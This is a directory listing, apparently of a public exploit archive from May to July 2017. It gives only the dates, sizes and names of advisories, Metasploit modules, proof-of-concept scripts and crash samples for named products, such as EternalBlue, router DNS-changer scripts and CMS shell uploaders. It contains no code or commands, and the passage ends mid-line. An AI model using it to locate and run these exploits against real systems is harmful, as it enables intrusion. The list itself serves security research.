05/24/2017 03:07 AM 15,946 CORE-2017-0002.txt 05/06/2017 03:08 AM 3,411 crypttech_cryptolog_login_exec.rb.txt 05/27/2017 04:06 AM 3,016 CSNC-2017-010.txt 05/27/2017 04:03 AM 4,332 CSNC-2017-011.txt 05/27/2017 04:08 AM 4,911 CSNC-2017-012.txt 05/17/2017 02:17 PM 3,025 CSNC-2017-013.txt 05/27/2017 04:15 PM 4,096 DC-2017-01-002.txt 05/27/2017 04:17 PM 4,201 DC-2017-01-009.txt 05/05/2017 11:01 PM 453,911 DC-2017-01-017_WordPress_Spider_Event_Calendar_Plugin_Advisory.pdf 05/11/2017 06:33 PM 395,430 DC-2017-01-020_WordPress_Tracking_Code_Manager_Plugin_Advisory.pdf 05/11/2017 07:22 PM 395,199 DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf 05/05/2017 11:22 PM 402,716 DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf 05/31/2017 02:25 PM 4,987 DC-2017-02-016.txt 05/05/2017 09:22 PM 450,500 DC-2017-04-011_WordPress_Facebook_Plugin_Advisory.pdf 05/12/2017 10:22 AM 448,352 DC-2017-04-012_google-api-php-client_Advisory.pdf 05/27/2017 04:18 PM 4,119 DC-2017-05-005.txt 05/27/2017 04:10 AM 4,875 dlink-crossdomain.txt 05/20/2017 04:15 PM 1,923 dlinkdir600m-bypass.txt 05/17/2017 02:23 PM 2,740 dupscts_bof.rb.txt 05/27/2017 11:11 AM 26,971,481 exploit-CVE-2017-7494.zip 05/02/2017 11:13 AM 32,380 fancyproduct_wp_plugin.txt 05/11/2017 12:20 AM 4,390 foxmole-2017-02-23.txt 05/11/2017 03:12 AM 41,900 freetds-dos.tgz 05/27/2017 04:09 AM 2,773 gc60-oobwrite.txt 05/08/2017 04:55 PM 5,688 gemaltosddt-overflow.txt 05/02/2017 12:38 AM 2,549 ghostscript_type_confusion.rb.txt 05/11/2017 03:15 AM 1,583 gongwalker11-sql.txt 05/11/2017 03:17 AM 2,808 gongwalker11-xsrf.txt 05/08/2017 03:04 PM 2,876 GS20170509005601.tgz 05/08/2017 06:02 PM 4,030 GS20170509005657.tgz 05/09/2017 11:32 AM 3,291 GS20170509131321.tgz 05/09/2017 11:44 AM 2,968 GS20170509131518.tgz 05/09/2017 11:33 AM 5,348 GS20170509131631.tgz 05/11/2017 01:02 AM 2,154 GS20170511022120.tgz 05/16/2017 05:57 AM 5,501 GS20170516045751.tgz 05/16/2017 05:59 AM 2,040 GS20170516045959.tgz 05/16/2017 06:02 AM 1,767 GS20170516050236.tgz 05/16/2017 06:04 AM 3,229 GS20170516050436.tgz 05/17/2017 05:46 AM 1,039 GS20170517044659.tgz 05/17/2017 05:47 AM 1,079 GS20170517044747.tgz 05/17/2017 05:48 AM 1,054 GS20170517044853.tgz 05/18/2017 02:32 AM 4,598 GS20170518042200.tgz 05/18/2017 04:22 AM 5,484 GS20170518042337.tgz 05/22/2017 06:02 PM 2,672 GS20170523000015.txt 05/23/2017 01:04 AM 2,089 GS20170523000449.tgz 05/23/2017 01:05 AM 3,290 GS20170523000551.tgz 05/23/2017 01:07 AM 1,522 GS20170523000703.tgz 05/24/2017 03:12 AM 1,896 GS20170524021238.tgz 05/24/2017 03:13 AM 1,981 GS20170524021344.tgz 05/24/2017 03:15 AM 2,030 GS20170524021506.tgz 05/24/2017 03:16 AM 1,210 GS20170524021614.tgz 05/24/2017 03:17 AM 1,853 GS20170524021717.tgz 05/24/2017 03:18 AM 1,275 GS20170524021826.tgz 05/24/2017 03:19 AM 1,900 GS20170524021929.tgz 05/25/2017 01:22 PM 19,224 GS20170526051134.txt 05/25/2017 02:02 PM 3,000 GS20170526051336.txt 05/25/2017 11:21 AM 2,429 GS20170526051454.txt 05/25/2017 06:02 PM 27,245 GS20170526051632.txt 05/25/2017 11:32 AM 2,664 GS20170526051757.txt 05/25/2017 12:11 PM 2,040 GS20170526052003.txt 05/25/2017 06:02 PM 2,810 GS20170526052320.txt 05/25/2017 01:03 PM 8,743 GS20170526052617.txt 05/25/2017 01:11 PM 23,487 GS20170526052824.txt 05/25/2017 02:33 PM 2,766 GS20170526053021.txt 05/25/2017 03:44 PM 24,816 GS20170526053229.txt 05/25/2017 02:33 PM 4,170 GS20170526053607.tgz 05/27/2017 02:02 PM 2,310 GS20170527154328.tgz 05/31/2017 04:33 AM 2,524 GS20170531133948.tgz 05/31/2017 05:44 AM 1,268 GS20170531134053.tgz 05/28/2017 06:55 AM 8,426 homeftpserverexploit.py.txt 05/22/2017 02:11 AM 4,041 hpsimplepass-escalate.txt 05/31/2017 11:22 AM 37,219 ibminformixds-execoverflow.txt 05/03/2017 02:02 PM 8,303 ie11cmarkup-uaf.txt 05/11/2017 03:23 AM 7,211 iis_webdav_scstoragepathfromurl.rb.txt 05/15/2017 06:02 PM 2,060 infoeam110-sql.txt 05/15/2017 04:55 PM 1,448 infoeam110-xss.txt 05/31/2017 01:33 AM 6,650 intelssdtoolbox-dllhijack.txt 05/27/2017 04:50 PM 12,040 is_known_pipename.rb.txt 05/27/2017 04:21 PM 1,328 jad158e-overflow.txt 05/05/2017 09:11 PM 707,138 jenkins-exec.pdf 05/20/2017 04:19 PM 1,514 joomla370fields-sql.txt 05/01/2017 05:22 PM 642 joomlajgrid444-sql.txt 05/24/2017 03:04 AM 928 joomlavideoflow120-sql.txt 05/23/2017 03:02 PM 6,247 kde45-escalate.txt 05/31/2017 11:33 AM 3,465 kemploadmaster7-xssexec.txt 05/19/2017 06:55 AM 2,158 kodakinsite80-xss.txt 05/17/2017 03:22 AM 3,106 labfnfsaxe37-overflow.txt 05/12/2017 01:32 AM 4,707 lk311sndbufforce-escalate.txt 05/12/2017 03:22 AM 16,543 lk3usbmidi-escalate.txt 05/14/2017 09:22 PM 4,093 MAILCOW-v0.14-CSRF-PASSWORD-RESET-ADD-ADMIN.txt 05/23/2017 12:23 AM 2,687 MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt 05/28/2017 06:02 PM 3,612 marsagent-dllhijack.txt 05/20/2017 04:35 PM 5,637 mediawiki_syntaxhighlight.rb.txt 05/20/2017 04:11 PM 4,347 mesdp90-bypass.txt 05/12/2017 12:11 PM 23,753 miniupnp-signedness.txt 05/18/2017 01:01 AM 6,457 MobaXterm_exploit_10.pl.txt 05/17/2017 01:00 AM 7,878 mobaxtrem102-exec.txt 05/02/2017 07:32 PM 7,234 modxrevolution256-sql.txt 05/17/2017 02:22 AM 2,062 mozfirefox50-dos.txt 05/10/2017 09:32 PM 390,295 MS17-010.txt 05/17/2017 05:56 AM 26,079 ms17_010_eternalblue.rb.txt 05/20/2017 04:24 PM 24,218 mswin72008eb-exec.txt 05/20/2017 04:21 PM 23,157 mswin82012eb-exec.txt 05/03/2017 11:11 AM 960 muracms706967-xss.txt 05/02/2017 12:36 AM 2,978 mysql5717-overflow.txt 05/16/2017 09:26 PM 5,928 nextcloudowncloud-xss.txt 05/27/2017 04:55 PM 12,524 octopusdeploy_deploy.rb.txt 05/15/2017 02:11 AM 13,471 openexr-fault.tgz 05/12/2017 04:02 AM 3,064 openvpn240-dos.txt 05/27/2017 03:59 AM 5,848 openvpnas214-crlf.txt 05/18/2017 04:33 AM 11,591 oraclepeoplesoft-xxe.txt 05/20/2017 04:30 PM 2,994 PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt 05/31/2017 02:59 PM 7,167 piwigofacetag003-sql.txt 05/22/2017 04:02 AM 4,140 pjsipasterisk-dos.txt 05/16/2017 01:02 AM 2,391 playsms14-exec.txt 05/20/2017 04:17 PM 2,520 playsms14admin-exec.txt 05/11/2017 03:19 AM 1,000 qnappsms-bypass.txt 05/13/2017 04:59 PM 6,125 quest_pmmasterd_bof.rb.txt 05/27/2017 04:13 PM 2,115 qwr1105-xss.txt 05/29/2017 08:42 PM 1,147,892 realplayer-memcorrupt.tgz 05/08/2017 03:22 AM 2,862 rpcbindlibtirpc-dos.txt 05/09/2017 02:10 PM 6,303 SA-20170509-0.txt 05/10/2017 09:32 PM 4,905 SA-20170510-0.txt 05/12/2017 11:11 AM 7,727 SA-20170511-0.txt 05/23/2017 08:32 PM 4,967 SA-20170523-0.txt 05/25/2017 05:44 AM 21,738 samba360-exec.txt 05/27/2017 04:33 AM 811 sandboxie518-dos.txt 05/20/2017 04:10 PM 10,379 sapbusinessone-xxe.txt 05/20/2017 04:28 PM 2,500 SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt 05/17/2017 05:57 AM 3,324 serviio_checkstreamurl_cmd_exec.rb.txt 05/28/2017 05:22 PM 4,549 shell-concrete5.py.txt 05/28/2017 06:01 PM 1,946 shell-dokuwiki.py.txt 05/28/2017 08:53 PM 2,572 shell-joomla.py.txt 05/31/2017 01:11 PM 1,736 shellup-modxcms.py.txt 05/17/2017 04:01 AM 3,263 sophoswebappliance4311-fixation.txt 05/23/2017 01:11 AM 1,274 surething621380-overflow.txt 05/20/2017 04:36 PM 2,647 syncbreeze_bof.rb.txt 05/31/2017 05:44 AM 1,571 terramaster3030-exec.txt 05/31/2017 12:23 AM 3,129 tieu208-overflow.txt 05/31/2017 06:55 AM 5,840 tmds65-xxeescalateexec.txt 05/17/2017 05:04 AM 18,526 tmiwsva65sp2-xssdisclose.txt 05/03/2017 09:53 AM 8,161 TM_osCommerce_sqli.txt 05/12/2017 05:44 AM 1,495 trash-sqlxss.txt 05/31/2017 04:22 AM 3,887 uchttp-lfi.txt 05/12/2017 02:11 AM 8,422 vanillaforums-exec.txt 05/09/2017 02:06 PM 12,830 veritasnetbackup80-exec.txt 05/05/2017 06:32 PM 7,868 vimbadmin3015-xsrf.txt 05/05/2017 07:02 PM 3,854 vimbadmin3015-xss.txt 05/03/2017 03:44 PM 12,573 VL-2034.txt 05/03/2017 03:01 PM 10,017 VL-2042.txt 05/03/2017 03:02 PM 14,421 VL-2044.txt 05/03/2017 04:22 PM 8,274 VL-2046.txt 05/03/2017 03:02 PM 7,536 VL-2058.txt 05/03/2017 04:02 PM 8,239 VL-2062.txt 05/17/2017 02:01 AM 5,289 VL-2064.txt 05/23/2017 02:02 PM 19,362 VL-2068.txt 05/17/2017 02:02 AM 7,569 VL-2069.txt 05/23/2017 01:22 PM 7,083 VL-2070.txt 05/23/2017 07:22 PM 9,994 VL-2072.txt 05/22/2017 03:01 AM 780 vmhorizon54-dllhijack.txt 05/23/2017 01:12 AM 2,639 vxsrchs_bof.rb.txt 05/05/2017 06:11 AM 30,571 wordpress46-exec.txt 05/09/2017 12:11 PM 1,349 wpcleanlogin-xsrf.txt 05/27/2017 10:22 AM 2,602 wpsocialstream-disclose.txt 05/17/2017 05:56 AM 6,131 wp_phpmailer_host_header.rb.txt 05/06/2017 11:32 AM 12,067 xampp-dllhijack.txt 05/03/2017 07:32 PM 3,785 ZSL-2017-5404.txt 05/03/2017 08:32 PM 2,562 ZSL-2017-5405.txt 05/03/2017 08:32 PM 1,591 ZSL-2017-5406.txt 05/04/2017 03:20 AM 2,557 ZSL-2017-5407.txt 05/04/2017 03:22 AM 6,231 ZSL-2017-5408.txt 05/29/2017 09:22 PM 18,755 ZSL-2017-5409.txt 05/31/2017 02:34 PM 4,099 ZSL-2017-5410.txt 05/31/2017 02:35 PM 7,029 ZSL-2017-5411.txt 05/31/2017 02:36 PM 17,016 ZSL-2017-5412.txt 194 File(s) 74,891,275 bytes Directory of \2017-exploits\1706-exploits 07/01/2017 05:46 PM <DIR> . 07/01/2017 05:46 PM <DIR> .. 07/01/2017 05:45 PM 761,692 1706-exploits.tgz 06/20/2017 06:32 PM 1,833 advisory.txt 06/15/2017 04:43 PM 2,439 aerohive-exec.txt 06/15/2017 12:36 AM 3,229 alioap60-sql.txt 06/29/2017 03:23 PM 5,024 apache_activemq_upload_jsp.rb.txt 06/16/2017 07:32 PM 1,805 apcups31414-escalate.txt 06/08/2017 04:02 AM 2,393 artifexmupdf-nullpointer.tgz 06/08/2017 06:22 AM 33,250 artifexmupdfmutool-nullpointer.tgz 06/16/2017 01:02 AM 1,144 avast1112253-escalate.txt 06/19/2017 12:02 AM 3,075 beetel-dnschange.sh.txt 06/05/2017 02:03 PM 2,475 BIND9-PRIVILEGE-ESCALATION.txt 06/22/2017 07:22 PM 3,282 blackcatcms12-xss.txt 06/08/2017 12:00 AM 7,909 bypassuac_fodhelper.rb.txt 06/15/2017 12:41 AM 6,381 camstudio20-xssxsf.txt 06/29/2017 03:15 PM 15,167 CORE-2017-0003.txt 06/07/2017 11:50 PM 3,845 craftcms26-xssupload.txt 06/02/2017 04:55 PM 4,971 DC-2017-01-012.txt 06/02/2017 09:22 PM 4,498 DC-2017-01-022.txt 06/26/2017 04:58 PM 327,563 DC-2017-04-002-IBM-DB2-Overflow.pdf 06/07/2017 03:34 PM 6,547 dcos_marathon.rb.txt 06/30/2017 11:22 AM 1,577 digitalcanalwa-overflow.txt 06/12/2017 02:11 AM 3,926 diskboss8016-overflow.txt 06/13/2017 08:32 PM 4,002 diskpulse9726-overflow.txt 06/02/2017 02:11 AM 1,025 disksorter9714-overflow.txt 06/10/2017 07:22 PM 4,235 disksorter9714input-overflow.txt 06/18/2017 12:02 AM 3,079 dlink2640-dnschange.sh.txt 06/18/2017 11:22 PM 3,079 dlink2640b-dnschange.sh.txt 06/20/2017 01:23 AM 3,081 dlink2640b_SEA_1.01-dnschange.sh.txt 06/26/2017 04:33 AM 1,815 dlinkdir100-xsrf.txt 06/05/2017 04:33 AM 3,496 dnstracer181-overflow.txt 06/24/2017 06:46 PM 7,535 easyfilesharing_post.rb.txt 06/13/2017 11:22 PM 2,503 easymovcon1424-overflow.txt 06/12/2017 02:01 AM 1,067 ecomcart13-sql.txt 06/09/2017 03:44 PM 4,895 ecs31-overflow.txt 06/09/2017 02:22 PM 1,631 ecs31-passwordreset.txt 06/09/2017 03:55 PM 1,225 ecs31pass-disclose.txt 06/11/2017 02:02 PM 2,081 efsws72-bypass.txt 06/30/2017 06:58 PM 3,407 efsws72account-overflow.txt 06/27/2017 11:11 AM 3,959 efsws72gethttp-overflow.txt 06/13/2017 12:01 AM 2,135 efsws72post-overflow.txt 06/16/2017 02:02 PM 9,124 efsws72postdep-overflow.txt 06/20/2017 01:26 AM 2,157 ektron910sp1-xss.txt 06/24/2017 06:39 PM 3,041 elteksmartpack-backdoor.txt 06/27/2017 03:22 PM 10,248 faad2-dos.tgz 06/27/2017 09:22 PM 3,267 fasm-overflow.txt 06/29/2017 08:32 PM 1,952 FreeBSD_CVE-2017-1085.c 06/29/2017 07:32 PM 2,107 FreeBSD_CVE-2017-FGPE.c 06/29/2017 06:32 PM 1,861 FreeBSD_CVE-2017-FGPU.c 06/27/2017 12:11 PM 1,965 glpi0904-sql.txt 06/20/2017 02:11 AM 1,131 gnubinutilsaarch64-overflow.tgz 06/20/2017 04:02 AM 977 gnubinutilsbfd-overflow.tgz 06/20/2017 05:02 AM 1,312 gnubinutilsdecodepseudo-overflow.tgz 06/20/2017 04:02 AM 1,323 gnubinutilsdisassemble-overflow.tgz 06/20/2017 04:03 AM 947 gnubinutilsieee-overflow.tgz 06/20/2017 05:44 AM 1,085 gnubinutilsinsn-overflow.tgz 06/20/2017 03:02 AM 1,075 gnubinutilsrxdecode-overflow.tgz 06/14/2017 04:33 AM 27,590 googlechromev8-exec.txt 06/07/2017 03:21 PM 2,699 gravcms142-xss.txt 06/01/2017 01:04 AM 2,685 GS20170601000226.txt 06/01/2017 01:06 AM 1,496 GS20170601000542.txt 06/01/2017 01:07 AM 3,822 GS20170601000718.txt 06/01/2017 01:09 AM 2,891 GS20170601000844.txt 06/01/2017 01:10 AM 1,592 GS20170601001027.txt 06/01/2017 01:11 AM 2,278 GS20170601001134.txt 06/06/2017 11:11 AM 3,451 GS20170606141325.tgz 06/12/2017 11:10 AM 2,691 GS20170613001803.tgz 06/13/2017 02:39 PM 3,034 GS20170613133910.tgz 06/13/2017 02:40 PM 3,177 GS20170613134001.tgz 06/13/2017 02:40 PM 2,212 GS20170613134052.tgz 06/16/2017 12:44 AM 5,017 GS20170615234417.txt 06/16/2017 12:48 AM 1,732 GS20170615234641.txt 06/15/2017 08:22 PM 1,750 GS20170615234933.txt 06/16/2017 12:52 AM 3,702 GS20170615235223.txt 06/21/2017 01:00 AM 3,035 GS20170621000010.tgz 06/21/2017 01:03 AM 2,151 GS20170621000128.tgz 06/21/2017 01:04 AM 3,136 GS20170621000448.tgz 06/21/2017 01:06 AM 3,516 GS20170621000601.tgz 06/21/2017 01:07 AM 2,367 GS20170621000701.tgz 06/21/2017 01:18 AM 1,980 GS20170621001802.tgz 06/21/2017 01:19 AM 1,866 GS20170621001935.tgz 06/21/2017 01:21 AM 1,756 GS20170621002106.tgz 06/21/2017 01:22 AM 1,861 GS20170621002221.tgz 06/21/2017 01:25 AM 1,905 GS20170621002505.tgz 06/21/2017 01:26 AM 2,645 GS20170621002612.tgz 06/21/2017 01:27 AM 2,496 GS20170621002722.tgz 06/21/2017 01:28 AM 1,866 GS20170621002840.tgz 06/21/2017 01:29 AM 1,904 GS20170621002954.tgz 06/21/2017 01:31 AM 1,891 GS20170621003106.tgz 06/21/2017 01:34 AM 3,150 GS20170621003438.tgz 06/21/2017 01:35 AM 2,633 GS20170621003537.tgz 06/21/2017 01:36 AM 2,194 GS20170621003652.tgz 06/21/2017 01:38 AM 2,158 GS20170621003811.tgz 06/21/2017 01:39 AM 1,715 GS20170621003914.tgz 06/21/2017 01:40 AM 1,708 GS20170621004015.tgz 06/21/2017 01:41 AM 1,629 GS20170621004107.tgz 06/21/2017 01:42 AM 2,734 GS20170621004207.tgz 06/21/2017 01:43 AM 2,766 GS20170621004313.tgz 06/21/2017 01:44 AM 2,813 GS20170621004445.tgz 06/21/2017 01:47 AM 2,322 GS20170621004712.tgz 06/21/2017 01:48 AM 2,425 GS20170621004811.tgz 06/21/2017 01:49 AM 2,792 GS20170621004907.tgz 06/21/2017 01:50 AM 2,344 GS20170621005001.tgz 06/21/2017 01:50 AM 2,892 GS20170621005051.tgz 06/21/2017 01:52 AM 1,621 GS20170621005218.tgz 06/21/2017 01:53 AM 3,043 GS20170621005320.tgz 06/21/2017 01:54 AM 1,713 GS20170621005447.tgz 06/21/2017 01:56 AM 2,202 GS20170621005542.tgz 06/21/2017 01:58 AM 2,425 GS20170621005750.txt 06/24/2017 06:53 PM 1,045 GS20170624175319.tgz 06/24/2017 06:54 PM 1,484 GS20170624175445.tgz 06/24/2017 06:55 PM 1,476 GS20170624175528.tgz 06/24/2017 06:56 PM 8,487 GS20170624175607.txt 06/24/2017 06:57 PM 4,180 GS20170624175756.tgz 06/30/2017 07:07 PM 2,426 GS20170630180753.tgz 06/30/2017 07:08 PM 1,822 GS20170630180845.tgz 06/13/2017 04:33 AM 1,043 gstreamer-null.tgz 06/14/2017 11:44 AM 1,503 hppagewide-exec.txt 06/05/2017 03:44 PM 1,445 hws191-exec.txt 06/16/2017 08:02 PM 3,073 iball-dnschange.sh.txt 06/15/2017 12:38 AM 18,202 ipb41192-xssxsrf.txt 06/10/2017 12:02 AM 1,784 ipfire219-exec.txt 06/26/2017 04:46 PM 4,492 jad158-overflow.txt 06/16/2017 03:22 PM 546 joomlajoomrecipe103-sql.txt 06/16/2017 12:11 PM 1,255 kbvaultmysql016a-upload.txt 06/05/2017 11:22 PM 4,359 kronostelestaff-sql.txt 06/26/2017 12:11 PM 3,201 lame3995iii-overflow.tgz 06/26/2017 02:03 PM 2,464 lame3995stepone-overflow.tgz 06/08/2017 08:38 PM 3,653 libcroco-dos.tgz 06/08/2017 08:40 PM 5,215 libquicktime-dos.tgz 06/30/2017 07:06 PM 18,991 Linux_ldso_dynamic.c 06/29/2017 08:32 PM 33,359 Linux_ldso_hwcap.c 06/30/2017 07:01 PM 32,019 Linux_ldso_hwcap_64.c 06/30/2017 07:00 PM 5,416 Linux_offset2lib.c 06/20/2017 01:31 AM 4,704 linux_sudo_cve-2017-1000367.c 06/08/2017 08:32 AM 332 lkkeyctl-dos.txt 06/08/2017 05:02 AM 849 lkping-dos.txt 06/11/2017 02:33 PM 2,070 logpoint-exec.txt 06/09/2017 03:02 PM 1,735 macosdiskarb-race.txt 06/09/2017 04:55 PM 2,173 mapscrn-overflow.txt 06/16/2017 02:11 AM 10,038 mikrotik-6-39-2ftp_buffer.py.txt 06/04/2017 02:33 PM 9,454 mikrotik-overflow.py.txt 06/16/2017 03:22 AM 11,394 mikrotik_cook_http_buffer.py.txt 06/30/2017 06:55 AM 4,528 mmdm-dllhijack.txt 06/30/2017 01:33 PM 5,674 msdotnet-dllhijack.txt 06/30/2017 05:22 PM 2,725 msdynamiccrm-xss.txt 06/27/2017 04:55 PM 7,722 mswordmta-exec.txt 06/13/2017 10:09 AM 7,825 mybb-xss-fileenum.txt 06/02/2017 03:44 PM 7,126 NAsamba.pl.txt 06/29/2017 02:33 PM 1,534 NetBSD_CVE-2017-1000375.c 06/24/2017 06:45 PM 3,288 netgear_dnslookup_cmd_exec.rb.txt 06/08/2017 04:02 AM 2,312 nmep-escalate.txt 06/26/2017 11:11 AM 1,174 ntfs31-dos.txt 06/16/2017 03:02 PM 1,107 nuevomailer6-sql.txt 06/30/2017 07:04 PM 18,098 OpenBSD_at.c 06/03/2017 01:12 PM 1,477 parallels-desktop-vm-escape.txt 06/05/2017 01:19 PM 1,477 parallels-desktop12-vm-escape.txt 06/10/2017 04:33 AM 515 paulshop-sql.txt 06/25/2017 02:02 PM 973 phpmailer-xss.txt 06/08/2017 07:22 AM 2,815 puttysshagent-overflow.txt 06/03/2017 12:23 AM 4,976 QSA-20170601-2.txt 06/12/2017 05:44 AM 902 realestateclassifieds-sql.txt 06/02/2017 11:11 AM 10,444 reiserfstune3625-overflow.txt 06/01/2017 05:22 PM 1,346 riverbedsteelheadvcx-fileread.txt 06/07/2017 11:11 AM 6,854 robert05-xssxsrftraversalsql.txt 06/07/2017 11:53 PM 5,023 SA-20170607-0.txt 06/13/2017 02:37 PM 6,294 SA-20170613-0.txt 06/23/2017 12:23 AM 13,332 SA-20170622-0.txt 06/05/2017 06:22 PM 2,855 safari101-overflow.tgz 06/30/2017 12:01 PM 1,685 schneiderelectricwiws-perms.txt 06/15/2017 01:03 AM 3,412 simplece230-xssxsrf.txt 06/21/2017 07:32 PM 1,350 sitecore72-xss.txt 06/29/2017 05:23 PM 10,715 Solaris_rsh.c 06/07/2017 03:15 PM 4,202 sophoscyberoam-xss.txt 06/29/2017 03:26 PM 52,925 ssl_uaf.rb.txt 06/03/2017 12:11 PM 2,510 SUBSONIC-CSRF-PERSISTENT-XSS.txt 06/03/2017 12:11 PM 3,301 SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt 06/03/2017 12:11 PM 2,292 SUBSONIC-PASSWORD-RESET-CSRF.txt 06/03/2017 12:11 PM 2,443 SUBSONIC-XML-EXTERNAL-ENITITY.txt 06/24/2017 06:46 PM 7,033 symantec_messaging_gateway_exec.rb.txt 06/11/2017 05:44 AM 3,899 syncbreeze9726-overflow.txt 06/08/2017 08:59 PM 5,658 SYSS-2017-018.txt 06/20/2017 02:33 AM 1,522 teamspeak314-overflow.txt 06/25/2017 03:02 PM 1,468 telegram3401-bypass.txt 06/18/2017 12:02 AM 3,068 UTstarcom-dnschange.sh.txt 06/22/2017 04:22 AM 1,593 vaadin776-xss.txt 06/22/2017 05:44 AM 10,172 VL-1973.txt 06/12/2017 02:01 PM 12,047 VL-2066.txt 06/07/2017 03:22 PM 15,284 VL-2067.txt 06/26/2017 04:47 PM 22,828 VL-2071.txt 06/11/2017 11:11 AM 10,229 VL-2073.txt 06/12/2017 02:02 PM 9,719 VL-2075.txt 06/07/2017 03:23 PM 10,592 VL-2076.txt 06/12/2017 04:33 AM 6,201 vmwarevsphere-deserialize.txt 06/08/2017 05:44 AM 1,567 vmwarews12pro-dos.txt 06/15/2017 04:22 PM 2,052 vxsearchenterprise9718-overflow.txt 06/08/2017 05:44 AM 2,246 wm2212-dos.tgz 06/20/2017 11:11 AM 1,568 wondercms210-xsrf.txt 06/21/2017 02:01 AM 1,822 wpdownloadmanager2951-xss.txt 06/13/2017 03:44 PM 908 wpeventlist078-sql.txt 06/23/2017 01:12 PM 2,349 wpformcraft105-sql.txt 06/15/2017 11:11 AM 1,362 wpjobmanager1261-xss.txt 06/14/2017 09:22 PM 987 wpjobs14-sql.txt 06/21/2017 02:00 AM 2,481 wpphotogallery1342-traversal.txt 06/03/2017 05:22 AM 1,055 wptestimonials-sql.txt 06/27/2017 03:44 PM 1,174 wpupc422-sql.txt 06/08/2017 04:33 AM 1,821 ws226-dos.tgz 06/05/2017 07:59 PM 7,972 X41-2017-005.txt 06/04/2017 02:02 AM 4,675 ZSL-2017-5413.txt 06/22/2017 08:23 PM 21,792 ZSL-2017-5414.txt 209 File(s) 2,045,384 bytes Directory of \2017-exploits\1707-exploits 08/04/2017 06:46 AM <DIR> . 08/04/2017 06:46 AM <DIR> .. 08/04/2017 06:44 AM 21,891,412 1707-exploits.tgz 07/03/2017 02:03 AM 5,556,852 1_BESTSAFEBROWSER.rar 07/03/2017 02:11 AM 8,121,779 2_AUSEDUAPP.rar 07/31/2017 11:11 AM 1,265 alzip-exec.txt 07/14/2017 03:44 PM 1,482 apachestruts23x-exec.txt 07/27/2017 02:02 PM 2,347 audiocoder0846-overflow.txt 07/18/2017 11:22 PM 8,693 barracudalb601006-exec.rb.txt 07/17/2017 02:11 AM 2,416 belkinf7d7601-exec.txt 07/19/2017 02:11 AM 20,353 bitcoin-core-bug.zip 07/26/2017 11:11 AM 1,830 bittorrent_installer-dllhijack.txt 07/03/2017 01:00 AM 1,061 boawebserver094-fileaccess.txt 07/14/2017 07:22 PM 4,459 ciscoddr-bypasstraversal.txt 07/19/2017 02:34 PM 4,252 citrix_sd_wan_cgisessid_cookie_preauth_root.rb.txt 07/02/2017 03:22 AM 1,249 cms221-lfi.txt 07/14/2017 06:03 PM 3,910,742 cscz-exec.tgz 07/12/2017 03:35 AM 2,223 datataker-disclose.txt 07/12/2017 03:45 AM 4,208 DC-2017-04-001.txt 07/30/2017 02:02 PM 5,584 diskboss8214-overflow.txt 07/31/2017 10:02 AM 18,549 divfix-dos.tgz 07/10/2017 03:22 AM 6,785 dnsamp-poc.pl.txt 07/02/2017 02:02 PM 833 doorgetscms70-redirect.txt 07/17/2017 05:44 AM 4,701 dotcms411-shell.txt 07/22/2017 03:30 AM 1,969 easychatserver_seh.rb.txt 07/22/2017 12:44 AM 6,014 ERPSCAN-17-037.txt 07/05/2017 04:10 PM 9,673 eVestigator-POC.tgz 07/15/2017 03:50 PM 2,597 example.rb-example.rb.txt 07/08/2017 12:02 AM 2,020 FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt 07/14/2017 05:32 PM 12,250 firefox5001-exec.txt 07/27/2017 05:22 PM 754 fiwmob17-passwordchange.txt 07/27/2017 05:44 PM 650 fiwmob17-sql.txt 07/27/2017 03:44 PM 637 fiwmob17-sqlbypass.txt 07/28/2017 08:22 PM 8,257 fortios560-xss.txt 07/27/2017 05:02 PM 1,978 freeipa-sessionhijack.txt 07/17/2017 01:01 AM 4,655 ftpgetter589085-overflow.txt 07/05/2017 03:57 PM 4,301 goautodial_3_rce_command_injection.rb.txt 07/18/2017 10:22 AM 4,395 GS20170719045342.txt 07/19/2017 05:57 AM 2,917 GS20170719045703.tgz 07/18/2017 08:22 AM 2,448 GS20170719045905.tgz 07/18/2017 03:22 PM 2,980 GS20170719050116.tgz 07/21/2017 05:33 PM 5,592 GS20170722015056.tgz 07/25/2017 02:43 AM 2,137 GS20170725014326.txt 07/25/2017 02:44 AM 904 GS20170725014438.txt 07/25/2017 02:46 AM 2,371 GS20170725014549.txt 07/25/2017 05:59 AM 1,577 GS20170725045736.txt 07/25/2017 06:01 AM 31,407 GS20170725050029.txt 07/25/2017 06:02 AM 24,873 GS20170725050222.txt 07/25/2017 06:04 AM 22,951 GS20170725050349.txt 07/25/2017 06:05 AM 29,414 GS20170725050515.txt 07/25/2017 06:06 AM 28,113 GS20170725050641.txt 07/25/2017 06:08 AM 22,932 GS20170725050805.txt 07/25/2017 06:10 AM 29,617 GS20170725051037.txt 07/25/2017 06:12 AM 20,397 GS20170725051206.txt 07/25/2017 06:15 AM 1,946 GS20170725051507.txt 07/17/2017 07:22 PM 2,695 hashicorp-escalate.txt 07/03/2017 01:12 PM 2,081 hg100r-xssdisclose.txt 07/03/2017 04:44 PM 3,829 insomniax-load.txt 07/22/2017 03:27 AM 3,967 ipfire_oinkcode_exec.rb.txt 07/12/2017 10:11 PM 1,518 ismartalarmbackend-ssrf.txt 07/15/2017 12:02 AM 7,105 ismartalarmcubeone-exec.txt 07/30/2017 05:44 AM 4,135 jenkins-deserialize.txt 07/27/2017 02:33 PM 1,600 joomlaccnewsletter219-sql.txt 07/20/2017 04:33 AM 1,323 joomlajoomrecipe104-sql.txt 07/07/2017 12:02 AM 5,531 KL-001-2017-010.txt 07/07/2017 12:55 AM 7,884 KL-001-2017-011.txt 07/07/2017 12:56 AM 3,536 KL-001-2017-012.txt 07/07/2017 12:58 AM 4,515 KL-001-2017-013.txt 07/07/2017 04:47 AM 9,664 KL-001-2017-014.txt 07/07/2017 04:49 AM 5,663 KL-001-2017-015.txt 07/26/2017 07:32 PM 5,895 lame3955-dos.tgz 07/05/2017 06:32 PM 6,469 lepide-exec.txt 07/31/2017 02:02 PM 6,459 libao-dos.tgz 07/27/2017 04:22 PM 4,240 libiberty-overflow.tgz 07/31/2017 04:02 PM 3,001 libid3tag-dos.tgz 07/26/2017 05:43 PM 3,428,929 libjpegturbo-dos.tgz 07/31/2017 02:22 PM 1,547 